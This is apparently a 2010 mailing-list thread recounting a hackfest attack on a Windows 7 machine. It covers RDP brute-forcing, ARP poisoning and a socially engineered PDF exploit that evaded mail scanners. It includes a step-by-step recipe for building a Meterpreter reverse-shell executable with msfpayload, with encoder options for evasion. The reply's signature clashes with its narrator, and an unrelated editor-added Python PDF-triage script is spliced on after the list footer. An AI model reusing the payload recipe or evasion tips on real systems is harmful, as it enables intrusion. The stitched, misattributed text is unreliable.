Hi Judd,

That was a very confusing email; I apologize (see below).

On Wed, Oct 13, 2010 at 1:42 PM, Judd Pickell <pickell@gmail.com> wrote:
Sorry, but I am a bit confused. You were or were not able to run an exploit on his machine?
 
Negative, none were able to exploit the Windows 7 machine. It was a "basic out of the box build" according to Harold. So embarrassing for our small but dedicated list of festers... (names withheld to protect the innocent :) )

If you remember, Harold Wong is something of an "evangelist" promoting "good source" over open or closed source, and especially educating people about the need for secure sources while debugging many of the myths upon which M$ bashing sits.

See Wong's blog:  http://blogs.technet.com/b/haroldwong/

See one of Harold's video interviews on Exchange Server 2010:  http://www.youtube.com/watch?v=rpa9ARgjUBU

Harold Wong left open just two ports on his Windows 7, via a wireless device connection to the Internet Untrusted Network (gangplank); the most significant was RDP 3389. Hydra was deployed to get the name and password, albeit unsuccessfully. Since Harold employs secure passwords (8 characters, truly random with one shifted character and one number), our 3389 dictionary attack was not going to be successful. Harold's son engaged in gaming from the machine itself, under well-engineered headphones, during the whole adventure.

Most of the festers concentrated on port 3389, of course.  Port 2638 was ignored.

Port 2638 is used by Sybase Adaptive Server Anywhere (ASA), a relational database management program developed and distributed by Sybase that can be used as a standalone server, multi-user multi-client server or a network server. Port 2638 is used for direct communication, data sharing, and file transfer with desktop systems, workgroup computers and other mobile environments. Port 2638 is most commonly used as an access point for mobile phones and smart phones with a remote server. Symantec Endpoint Protection also uses port 2638 by default. Our group did not determine without a doubt which application was using this port. Implementation of the Symantec Endpoint Protection Remote Console requires that the user or installation process create a protocol definition for TCP port 2638 with an ACL. None of our festers attempted to exploit that port.

It was generally assumed (and hinted by me to all festers last month) that the best possible attack vector for this exercise was layer 8 of the OSI model, the human error layer, or insecure computing. However, our festers spent a great deal of time with XHydra and CAIN ARP cache poisoning and RDP protocol verification (patched for greater security historically and incorporated into Windows 7); they swiftly degenerated from a team approach to finding other network devices of interest, trading lies and stealing candy from Gangplankhq.com's generous TREAT bowls.

At 15:25 (25 minutes past the end of the exercise) I put together a quick attachment exploit for Adobe, ensuring "through social engineering" it would be opened, and creatively delivered it, having to deftly ensure delivery past various virus checkers with the pdf intact. Unfortunately I had given Harold Wong a great number of hints, such as dangerous Adobe PDFs being available, and I had hinted to others that pdf creation for a custom reverse shell was fun and trivial from within Metasploit (***See below).

Therefore, Harold Wong was not using Adobe for reading such files and my exploit fell on deaf ears, so to speak, bringing up a nasty pop-up error to the user indicating that the pdf executed more than was expected. Granted, in a real-world example, Adobe would be used, shipping by default. NOTE also that the virus checking software did not at any time find my exploit attachment and scrub it. While any such exploit was QUICKLY discovered by GOOGLE MAIL and quarantined, that Adobe attachment email exploit WAS SENT HAPPILY THROUGH Microsoft's email servers directly to Harold Wong. Of course another fun item would be a GoToAssist cookie

GENERALLY, I take myself out of the flag capture events, since I end up supporting the fest process. The purpose of the event is training and fun for the festers, not to watch Lisa take all the flags <grin> (there is NO SUBSTITUTE for experience).


In a real-world example, an attacker also would have properly attached an RDP exploit (which was not even identified by Google's virus attachment scrapers), which would have instantly provided us with FLAG JOY. For real fun

So, once again, Linux installed "out of the box" opening an insecure pdf would create the same effect as Windows 7. Linux installed per defaults, running on an untrusted network, with secure passwords and comparable firewalling, is equal, is it not?


HowTo Meterpreter//Metasploit PDF:


"output.exe" was either created from compiling a payload using template.c
in the Metasploit folder or by using the following CLI:
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
  msfencode -b '' -t exe -o meterpreter.exe
Here's what it does:
Part 1
1. msfpayload calls a payload, in this case meterpreter (reverse tcp).
2. LHOST (listening host) is set to A.B.C.D (an IP address; I think DNS hostnames are supported too).
3. LPORT (listening port) is set to 8080; set this to anything above 1024 if you're on Linux, since anything below requires root privileges.
4. R means RAW (pure unreadable binary machine code).
5. | means pipe the output, and \ is used because msfencode is on a new line.

Part 2
1. msfencode is used for encoding.
2. -b means bad characters; in this case there are none (this is almost always needed in real exploitation).
3. -t means type, and since "exe" without quotes is written, the type is set to exe of course.
4. -o means output, because we need to send the output somewhere, in this case meterpreter.exe, which could also be output.exe etc.

Short explanation of the pipe process:
First msfpayload creates the payload by using easily customizable shellcode
with all the right ARGS (arguments) that you need; then it is sent to a
pipe which sends all the binary / RAW output to msfencode, which encodes
this and compiles this into a valid exe file.

With msfencode it is also possible to use:
-a (the architecture to use, irrelevant in this case)
-e (the encoder to use, e.g. x86/shikata_ga_nai)

With the -t switch it is possible to choose the following types:
c, elf, exe, java, perl, raw, ruby and vba

Please use the -h (help) switch, or write --help or just "help" (without quotes)
in Metasploit for further help, since there is a lot of nice info when you use that.

I also recommend that you read the nice documentation, it's really worth it.
You don't have to read the developer documentation, but I think some of it
was actually quite a nice read.

FREE ONLINE VERSION of METASPLOIT UNLEASHED: 
http://www.offensive-security.com/metasploit-unleashed/

Of course, set up a virtual and unpatched Windows XP machine to play with as well!

Sincerely,
Judd Pickell

On Tue, Oct 12, 2010 at 7:11 PM, Lisa Kachold <lisakachold@obnosis.com> wrote:
We promised various people that we would be following up with a real blow-by-blow of our exploit of Harold Wong's Windows 7 machine.

It's published over on hackfest.obnosis.com under:

<please register to share files, get updates and accept our "terms of service".>

Possible ways to attack Harold Wong's Windows 7:

Network port attack vector:
Open ports:

3389

Using RDP we could do either an RDP MITM attack or a Hydra dictionary attack on the listening service itself.

Example RDP MITM:
http://www.irongeek.com/i.php?page=videos/cain-rdp-terminal-server-mitm-...

Should get RDP on Windows 7 via MITM if possible, with loose encryption, in a real-world situation where RDP traffic connections were working and we could ARP cache poison them.

Just having the port open, we would have to do a Hydra dictionary attack, and Harold informed us that he used secure passwords.

Therefore the only real attack vector we ever had open was social engineering to get him to click on an exploit delivered via insecure file sharing.

Sending a Kaseya agent, LivePerson cookie, or Metasploit payload via pdf in mail after getting assurance of his willingness to open it by asking him to look at it attached to an email.

In the real-world test Lisa Kachold delivered a pdf exploiting Adobe, but since Harold Wong wisely doesn't use Adobe for his PDFs, it failed.

No one crafted or delivered an RDP "package" for email delivery, which would have worked best: http://www.gnucitizen.org/blog/remote-desktop-command-fixation-attacks/

Additionally, in a real-world situation we might have to obfuscate the code in our pdf, or it will not be accepted as an attachment in Gmail. If Harold Wong was using Microsoft Outlook directly to an MS-based Mail Transport Authority, we would have a better chance of getting our PDF accepted, depending on spam/virus protection.

Harold Wong used a regular user desktop, without file sharing available, configured for the "Internet Zone" without additional firewall or virus checking add-ons.

No flags were delivered by our team for Harold Wong.*

So, as heretical as it might seem, this completely debugs the myth that "Microsoft 7 out of the box is more secure than Linux".

hide everyone - here comes the fallout
--
Skype: 6022393392
Fax:     6233211450
ATT:     5037544452
Phoenix Linux Security Team

http://www.it-clowns.com

"Great things are not done by impulse but a series of small things brought together." -Van Gogh
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
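The thread above notes that a PDF carrying exploit code passed one provider's mail scanners untouched and that obfuscating it would be needed to get past another. As an added example (editor's code, not from any message in this thread), here is a defender-side triage check for PDF attachments at a mail gateway: it decodes the #xx hex-escaped names and inflates the FlateDecode streams that such obfuscation relies on before looking for the name objects that make a PDF active content. The risky-name list, the quarantine/review tiers and the three sample documents are this example's own assumptions; the samples are constructed, not real files.

```python
import re
import zlib
# PDF name objects that make a document active content rather than static pages.
# Names may be written with #xx hex escapes (/J#61vaScript) to dodge naive filters.
RISKY_NAMES = ("/JavaScript", "/JS", "/Launch", "/EmbeddedFile",
               "/OpenAction", "/AA", "/RichMedia", "/URI")
QUARANTINE_NAMES = {"/JavaScript", "/JS", "/Launch", "/EmbeddedFile"}

def expand_streams(data):
    """Append inflated FlateDecode stream bodies so names inside compressed objects are scanned."""
    extra = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.DOTALL):
        try:
            extra.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not zlib data or truncated; other filters are not handled here
    return data + b"\n" + b"\n".join(extra)

def normalise_names(data):
    """Decode #xx escapes inside name objects: /J#61vaScript -> /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def triage_pdf(data):
    """Return {risky name: occurrence count} for a raw PDF byte string."""
    if b"%PDF-" not in data[:1024]:
        raise ValueError("no PDF header in the first 1 KiB")
    text = normalise_names(expand_streams(data))
    found = {}
    for name in RISKY_NAMES:
        # A name ends at whitespace or a delimiter, so /JS must not match /JSX.
        pat = re.escape(name.encode()) + rb"(?=[\s/<>\[\](){}%]|$)"
        count = len(re.findall(pat, text))
        if count:
            found[name] = count
    return found

def verdict(data):
    found = triage_pdf(data)
    if not QUARANTINE_NAMES.isdisjoint(found):
        return "quarantine"
    return "review" if found else "clean"
# Constructed samples, not real documents: a static page; a catalog whose OpenAction
# runs a Flate-compressed object holding hex-escaped JavaScript; one that only opens a URI.
CLEAN_PDF = b"%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n%%EOF\n"
JS_PDF = (b"%PDF-1.4\n1 0 obj<</Type/Catalog/OpenAction 3 0 R>>endobj\n"
          b"3 0 obj<</Filter/FlateDecode>>stream\n"
          + zlib.compress(b"<</S/J#61vaScript/JS(app.alert(1))>>")
          + b"\nendstream endobj\n%%EOF\n")
URI_PDF = (b"%PDF-1.4\n1 0 obj<</Type/Catalog/OpenAction<</S/URI"
           b"/URI(http://example.invalid/)>>>>endobj\n%%EOF\n")
```

This is a coarse pre-filter for a gateway, not a parser: it inflates only zlib streams and ignores other PDF filters and encrypted documents, so treat a "clean" verdict as "nothing obvious" rather than "safe".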